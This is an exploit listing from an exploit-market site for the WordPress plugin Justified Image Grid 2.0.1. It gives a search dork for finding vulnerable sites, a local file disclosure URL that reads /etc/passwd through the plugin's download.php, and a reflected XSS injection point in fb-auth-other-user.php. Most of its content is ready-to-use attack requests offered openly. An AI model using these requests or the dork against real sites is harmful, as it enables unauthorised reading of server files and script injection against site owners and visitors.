[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Justified Image Grid 2.0.1 LFD / XSS Vulnerabilities

Author
NULLpOint7r
Risk
[
Security Risk High
]
0day-ID
0day-ID-23293
Category
web applications
Date add
16-02-2015
Platform
php
# Exploit Title: Wordpress plugin Justified Image Grid 2.0.1 LFD + XSS
# Exploit Author: NULLpOint7r
# Contact me: [email protected]
# Home: http://www.sec4ever.com/home/
# Dork: inurl:/wp-content/plugins/justified-image-grid/
# Date: 2015-02-16
# Version: 2.0.1

1 - LFD:
	http://127.0.0.1/wp-content/plugins/justified-image-grid/download.php?file=file:///etc/passwd

2 - XSS:
	http://127.0.0.1/wp-content/plugins/justified-image-grid/fb-auth-other-user.php?error_message=[XSS]

pOc:
http://s24.postimg.org/wen4a4hth/image.png
http://s10.postimg.org/4gjk3sgop/image.png

see you later

#  0day.today [2024-03-29]  #